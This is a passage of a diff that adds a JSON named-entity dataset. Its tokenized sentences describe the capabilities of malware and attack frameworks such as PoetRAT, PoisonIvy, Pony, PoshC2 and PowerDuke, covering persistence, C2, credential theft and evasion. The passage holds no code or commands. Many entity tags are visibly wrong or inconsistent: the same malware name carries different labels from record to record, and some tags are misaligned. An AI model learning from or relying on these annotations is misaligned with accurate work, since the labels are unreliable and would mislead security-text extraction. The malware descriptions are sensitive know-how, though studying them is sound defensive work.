"encryption", + "scheme", + "for", + "communication", + "between", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "list", + "all", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "was", + "executed", + "with", + "a", + "Python", + "script", + "and", + "worked", + "in", + "conjunction", + "with", + "additional", + "Python-based", + "post-exploitation", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "added", + "a", + "registry", + "key", + "in", + "the", + "<RUN>", + "hive", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "used", + "Nmap", + "for", + "remote", + "system", + "discovery." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "take", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "was", + "distributed", + "via", + "malicious", + "Word", + "documents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "checked", + "the", + "size", + "of", + "the", + "hard", + "drive", + "to", + "determine", + "if", + "it", + "was", + "being", + "run", + "in", + "a", + "sandbox", + "environment.", + "In", + "the", + "event", + "of", + "sandbox", + "detection,", + "it", + "would", + "delete", + "itself", + "by", + "overwriting", + "the", + "malware", + "scripts", + "with", + "the", + "contents", + "of", + "\"License.txt\"", + "and", + "exiting." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "the", + "ability", + "to", + "gather", + "information", + "about", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "sent", + "username,", + "computer", + "name,", + "and", + "the", + "previously", + "generated", + "UUID", + "in", + "reply", + "to", + "a", + "\"who\"", + "command", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "a", + "Python", + "tool", + "named", + "Bewmac", + "to", + "record", + "the", + "webcam", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "Word", + "documents", + "with", + "VBScripts", + "to", + "execute", + "malicious", + "activities." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "used", + "HTTP", + "and", + "HTTPs", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoetRAT", + "has", + "called", + "cmd", + "through", + "a", + "Word", + "document", + "macro." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Tool", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "a", + "Registry", + "key", + "in", + "the", + "Active", + "Setup", + "pointing", + "to", + "a", + "malicious", + "executable." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "captures", + "window", + "titles." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "steal", + "system", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "can", + "inject", + "a", + "malicious", + "DLL", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "upload", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "contains", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PoisonIvy", + "stages", + "collected", + "data", + "in", + "a", + "text", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "a", + "Registry", + "subkey", + "that", + "registers", + "a", + "new", + "system", + "device." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "hides", + "any", + "strings", + "related", + "to", + "its", + "own", + "indicators", + "of", + "compromise." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "run", + "key", + "Registry", + "entries", + "pointing", + "to", + "a", + "malicious", + "executable", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "starts", + "a", + "rootkit", + "from", + "a", + "malicious", + "file", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "uses", + "the", + "Camellia", + "cipher", + "to", + "encrypt", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "open", + "a", + "command-line", + "interface." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoisonIvy", + "creates", + "a", + "Registry", + "subkey", + "that", + "registers", + "a", + "new", + "service.", + "PoisonIvy", + "also", + "creates", + "a", + "Registry", + "entry", + "modifying", + "the", + "Logical", + "Disk", + "Manager", + "service", + "to", + "point", + "to", + "a", + "malicious", + "DLL", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "use", + "Twitter,", + "Reddit,", + "Imgur", + "and", + "other", + "websites", + "to", + "get", + "a", + "C2", + "URL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Org", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "use", + "a", + "custom", + "algorithm", + "to", + "decrypt", + "strings", + "used", + "by", + "the", + "malware." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "store", + "encrypted", + "JSON", + "configuration", + "files", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "retrieve", + "payloads", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "write", + "encrypted", + "JSON", + "configuration", + "files", + "to", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "use", + "<code>LoadLibraryW</code>", + "and", + "<code>CreateProcess</code>", + "to", + "load", + "and", + "execute", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "custom", + "encrypt", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "be", + "executed", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "can", + "use", + "steganography", + "to", + "hide", + "C2", + "information", + "in", + "images." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PolyglotDuke", + "has", + "has", + "used", + "HTTP", + "GET", + "requests", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "used", + "scripts", + "to", + "delete", + "itself", + "after", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "can", + "download", + "additional", + "files", + "onto", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "used", + "the", + "<code>NetUserEnum</code>", + "function", + "to", + "enumerate", + "local", + "accounts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "attempted", + "to", + "lure", + "targets", + "into", + "downloading", + "an", + "attached", + "executable", + "(ZIP,", + "RAR,", + "or", + "CAB", + "archives)", + "or", + "document", + "(PDF", + "or", + "other", + "MS", + "Office", + "format)." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "attempted", + "to", + "lure", + "targets", + "into", + "clicking", + "links", + "in", + "spoofed", + "emails", + "from", + "legitimate", + "banks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Pony", + "has", + "used", + "the", + "Adobe", + "Reader", + "icon", + "for", + "the", + "downloaded", + "file", + "to", + "look", + "more", + "trustworthy." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "used", + "several", + "Windows", + "functions", + "for", + "various", + "purposes." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Pony", + "attachments", + "have", + "been", + "delivered", + "via", + "compressed", + "archive", + "files.", + "Pony", + "also", + "obfuscates", + "the", + "memory", + "flow", + "by", + "adding", + "junk", + "instructions", + "when", + "executing", + "to", + "make", + "analysis", + "more", + "difficult." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "used", + "a", + "small", + "dictionary", + "of", + "common", + "passwords", + "against", + "a", + "collected", + "list", + "of", + "local", + "accounts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "been", + "delivered", + "via", + "spearphishing", + "attachments." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "been", + "delivered", + "via", + "spearphishing", + "emails", + "which", + "contained", + "malicious", + "links." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "collected", + "the", + "Service", + "Pack,", + "language,", + "and", + "region", + "information", + "to", + "send", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "delayed", + "execution", + "using", + "a", + "built-in", + "function", + "to", + "avoid", + "detection", + "and", + "analysis." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "sent", + "collected", + "information", + "to", + "the", + "C2", + "via", + "HTTP", + "POST", + "request." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pony", + "has", + "used", + "batch", + "scripts", + "to", + "delete", + "itself", + "after", + "execution." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "use", + "Invoke-TokenManipulation", + "for", + "manipulating", + "tokens." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "a", + "module", + "for", + "compressing", + "data", + "using", + "ZIP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "a", + "module", + "for", + "recursively", + "parsing", + "through", + "files", + "and", + "directories", + "to", + "gather", + "valid", + "credit", + "card", + "numbers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "has", + "modules", + "for", + "brute", + "forcing", + "local", + "administrator", + "and", + "AD", + "user", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "utilize", + "multiple", + "methods", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "use", + "Invoke-RunAs", + "to", + "make", + "tokens." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "modules", + "for", + "searching", + "for", + "passwords", + "in", + "local", + "and", + "remote", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "decrypt", + "passwords", + "stored", + "in", + "the", + "RDCMan", + "configuration", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "enumerate", + "local", + "and", + "domain", + "user", + "account", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "has", + "modules", + "for", + "enumerating", + "domain", + "trusts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "modules", + "for", + "local", + "privilege", + "escalation", + "exploits", + "such", + "as", + "CVE-2016-9192", + "and", + "CVE-2016-0099." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "a", + "module", + "for", + "exploiting", + "SMB", + "via", + "EternalBlue." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "enumerate", + "files", + "on", + "the", + "local", + "file", + "system", + "and", + "includes", + "a", + "module", + "for", + "enumerating", + "recently", + "accessed", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "has", + "modules", + "for", + "keystroke", + "logging", + "and", + "capturing", + "credentials", + "from", + "spoofed", + "Outlook", + "authentication", + "messages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "use", + "Inveigh", + "to", + "conduct", + "name", + "service", + "poisoning", + "for", + "credential", + "theft", + "and", + "associated", + "relay", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "an", + "implementation", + "of", + "Mimikatz", + "to", + "gather", + "credentials", + "from", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "enumerate", + "local", + "and", + "domain", + "user", + "account", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "modules,", + "such", + "as", + "<code>Get-LocAdm</code>", + "for", + "enumerating", + "permission", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "perform", + "port", + "scans", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "a", + "module", + "for", + "taking", + "packet", + "captures", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "has", + "a", + "number", + "of", + "modules", + "that", + "leverage", + "pass", + "the", + "hash", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "use", + "<code>Get-PassPol</code>", + "to", + "enumerate", + "the", + "domain", + "password", + "policy." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "multiple", + "modules", + "for", + "injecting", + "into", + "processes,", + "such", + "as", + "<code>Invoke-PSInject</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "modules", + "that", + "allow", + "for", + "use", + "of", + "proxies", + "in", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "an", + "implementation", + "of", + "PsExec", + "for", + "remote", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "modules,", + "such", + "as", + "<code>Get-ComputerInfo</code>,", + "for", + "enumerating", + "common", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "enumerate", + "network", + "adapter", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "PoshC2", + "contains", + "an", + "implementation", + "of", + "netstat", + "to", + "enumerate", + "TCP", + "and", + "UDP", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "enumerate", + "service", + "and", + "service", + "permission", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "can", + "use", + "protocols", + "like", + "HTTP/HTTPS", + "for", + "command", + "and", + "control", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "has", + "a", + "number", + "of", + "modules", + "that", + "use", + "WMI", + "to", + "execute", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PoshC2", + "has", + "the", + "ability", + "to", + "persist", + "on", + "a", + "system", + "using", + "WMI", + "events." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PowGoop", + "can", + "side-load", + "`Goopdate.dll`", + "into", + "`GoogleUpdate.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PowGoop", + "can", + "decrypt", + "PowerShell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "PowGoop", + "can", + "receive", + "encrypted", + "commands", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowGoop", + "has", + "disguised", + "a", + "PowerShell", + "script", + "as", + "a", + ".dat", + "file", + "(goopdate.dat)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-SamFile", + "I-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "PowGoop", + "has", + "used", + "a", + "DLL", + "named", + "Goopdate.dll", + "to", + "impersonate", + "a", + "legitimate", + "Google", + "update", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowGoop", + "can", + "use", + "a", + "modified", + "Base64", + "encoding", + "mechanism", + "to", + "send", + "data", + "to", + "and", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowGoop", + "has", + "the", + "ability", + "to", + "use", + "PowerShell", + "scripts", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowGoop", + "can", + "send", + "HTTP", + "GET", + "requests", + "to", + "malicious", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Power", + "Loader", + "overwrites", + "Explorer’s", + "Shell_TrayWnd", + "extra", + "window", + "memory", + "to", + "redirect", + "execution", + "to", + "a", + "NTDLL", + "function", + "that", + "is", + "abused", + "to", + "assemble", + "and", + "execute", + "a", + "return-oriented", + "programming", + "(ROP)", + "chain", + "and", + "create", + "a", + "malicious", + "thread", + "within", + "Explorer.exe." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "a", + "command", + "to", + "get", + "text", + "of", + "the", + "current", + "foreground", + "window." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "a", + "command", + "to", + "write", + "random", + "data", + "across", + "a", + "file", + "and", + "delete", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "a", + "command", + "to", + "write", + "random", + "data", + "across", + "a", + "file", + "and", + "delete", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "commands", + "to", + "get", + "the", + "current", + "directory", + "name", + "as", + "well", + "as", + "the", + "size", + "of", + "a", + "file.", + "It", + "also", + "has", + "commands", + "to", + "obtain", + "information", + "about", + "logical", + "drives,", + "drive", + "type,", + "and", + "free", + "space." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "a", + "command", + "to", + "download", + "a", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "hides", + "many", + "of", + "its", + "backdoor", + "payloads", + "in", + "an", + "alternate", + "data", + "stream", + "(ADS)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "a", + "command", + "to", + 